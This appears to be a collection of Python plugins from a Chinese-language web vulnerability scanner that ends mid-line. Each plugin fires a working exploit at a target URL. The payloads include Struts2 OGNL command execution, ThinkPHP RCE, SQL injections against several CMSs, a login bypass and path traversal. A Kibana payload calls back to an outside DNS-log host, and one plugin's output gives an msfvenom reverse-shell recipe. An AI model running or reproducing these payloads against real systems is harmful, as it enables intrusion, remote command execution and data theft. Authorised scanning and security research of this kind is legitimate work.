def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None: proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) try: payload = "/WEB-INF/web.xml" payload_url = Url+ payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url,headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and resp.headers["Content-Type"] == "application/xml": Medusa = "{}存在Java配置文件泄露漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port data = '''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''' try: payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-009\r\n返回数据:{}\r\n部署系统:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url = scheme + "://" + url + ":" + str(port) + '/jar/upload' getshell = "msfvenom -p java/shell_reverse_tcp lhost=you_ip lport=5555 -f jar >/root/Desktop/shell.jar\r\n生成jar包后在主页找到Submit New Job位置上传jar包\r\n最后点进上传好的jar包后再点击Submit即可在nc上getshell" resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("Unable to load requested file /jar/upload" ) != -1 and code == 404: Medusa = "{}存在Flink未授权命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回内容:{}\r\nGetshell方法:\r\n{}\r\n".format( url, payload_url, resp.text, getshell) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/index.php?s=/index/search/index.html" data = {'s': '<script>confirm({})</script>'.format(rm)} payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.post(payload_url, headers=Headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( "<script>confirm({})</script>".format(rm)) != -1: Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("on line") and con.find("in"): Medusa = "{}存在Ecshop信息泄漏漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php" payload2="/admin/admin.php" payload_url = scheme + "://" + url +":"+ str(port)+ payload payload_url2 = scheme + "://" + url + ":" + str(port) + payload2 data="_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\r\n" headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url,headers=headers,data=data, proxies=proxies,timeout=6, verify=False) resp2 = requests.post(payload_url2, headers=headers, data=data,proxies=proxies, timeout=6, verify=False) con = resp2.text code = resp2.status_code if con.find("admin_form.php?action=form_list&nav=list_order") != -1 and con.find("admin_main.php?nav=main") != -1: Medusa = "{}存在BEESCMS登录绕过漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/enableq/enableq91_php52/Export/Export.log.inc.php?ExportSQL=U0VMRUNUIGEuKixjb25jYXQoTUQ1KDEpLCc6JyxkYXRhYmFzZSgpKSBhcyBhZG1pbmlzdHJhdG9yc05hbWUgRlJPTSBlcV9hZG1pbmlzdHJhdG9yc2xvZyBhLCBlcV9hZG1pbmlzdHJhdG9ycyBiIFdIRVJFIGEuYWRtaW5pc3RyYXRvcnNJRD1iLmFkbWluaXN0cmF0b3JzSUQgT1JERVIgQlkgYS5hZG1pbmlzdHJhdG9yc0xvZ0lEIERFU0M=' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849b") != -1: Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = '''?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat -an&pp=____A&ppp=%20&encoding=UTF-8''' try: payload_url = scheme + "://" + url + ":" + str( port) + "/index.action" + payload headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-032\r\n返回数据:{}\r\n部署系统:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,Token,proxies=None): proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port Payloads = [ '/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#', '/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23', '/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa', "/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#", "/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#" ] for payload in Payloads: try: payload_url = scheme + "://" + url +":"+ str(port)+ payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url,headers=headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code==200 and con.find("202cb962ac59075b964b07152d234b70") != -1 : Medusa = "{}存在EasethinkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = '''?debug=command&expression=(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="netstat -an",%[email protected]@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[1000],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%[email protected]@getResponse(),%23out.getWriter().println(%23echo))''' try: payload_url = scheme + "://" + url + ":" + str( port) + "/index.action" + payload headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-008-2\r\n返回数据:{}\r\n部署系统:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" payloadurl = scheme + "://" + url + ":" + str(port) + payload payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" domain_name = ".".join(url.split(".")[1:]) payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2 Payloads = [payloadurl,payloadurl2] for payload_url in Payloads: try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp =requests.get(payload_url, headers=headers,proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 and con.find('System') != -1: Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l =ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload1="/foo/profiles/..%28_%29Windows/win.ini" payload2 = "/foo/profiles/..%28_%29etc/hosts.allow" payload3 = "/foo/profiles/%252f..%252f..%252f..%252fetc/hosts.allow" payload4 = "/foo/profiles/%252f..%252f..%252f..%252fWindows/win.ini" for i in [ payload1, payload2, payload3, payload4]: try: payload_url = scheme + "://" + url +":"+ str(port)+ i headers = { 'User-Agent': RandomAgent, 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en', 'Connection': 'close', "Upgrade-Insecure-Requests": "1" } resp = requests.get(payload_url,headers=headers, timeout=6, verify=False,allow_redirects=False) con = resp.text code = resp.status_code if code==200 and con.find("root:x:")!=-1 and con.find("bin:x")!=-1 and con.find("lp:x")!=-1: Medusa = "{} 存在Spring反射文件下载漏洞\r\n漏洞地址:\r\n{}\r\n返回内容:\r\n{}".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()#传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url1 = scheme + '://' + url + ':' + str(port) + "/api/timelion/run" payload_url2 = scheme + '://' + url + ':' + str(port) + '/app/canvas' ran = randoms().result(10) payload_post = '''{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"ping %s.mdtx4t.ceye.io\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],"time":{"from":"now-15m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}''' % ran headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json;charset=utf-8', 'Referer': scheme+'://'+url+':'+str(port)+'/app/timelion', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', } resp = requests.post(payload_url1, headers=headers, data=payload_post, timeout=5, verify=False) resp2 = requests.get(payload_url2, headers=headers, timeout=5, verify=False) dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=http&filter=' time.sleep(5) resp3 = requests.get(dnslog, timeout=5, verify=False) con = resp3.text if con.find(ran) != -1: Medusa = "{}存在Kibana远程命令执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nDNSlog数据:{}\r\n".format(url, payload_url1, con,) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php?s=captcha" data = "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("uid=") != -1 and con.find( "gid=") != -1 and con.find("groups=") != -1: Medusa = "{}存在ThinkPHP任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php?s=/index/index/name/$%7B@phpinfo()%7D" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("PHP Version") != -1 and con.find( "System") != -1 and con.find("Build Date") != -1: Medusa = "{}存在ThinkPHP任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'cookie': 'sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))' } resp = requests.post(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849") != -1: Medusa = "{}存在EasethinkCookie注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/index.php?case=tool&act=cut_image' data = 'pic=1ftp://192.168.1.5/phpinfo.php&w=700&h=1120&x1=0&x2=700&y1=0&y2=1120' payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '\/upload\/images\/201612\/148159258747.php') != -1: Medusa = "{}存在CmsEasy跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23" # 爆用户密码用 # payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573 \ # %2565%256C%2565%2563%2574%201,concat(CS_AdminName,0x3a,CS_AdminPass),3,4,5,6,\ # 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,\ # 34,35,36,37,38,39,40,41,42%20from%20cscms_admin%23" payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("'904c23abadd5a4648a973c86385f3930'") != -1: Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url:str,RandomAgent:str,Token:str,proxies:str=None)->None: proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/api/jsonws/invoke' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close" } DL=Dnslog() #DL="http://333.q7d5zn.dnslog.cn".encode('utf-8') hex_data = 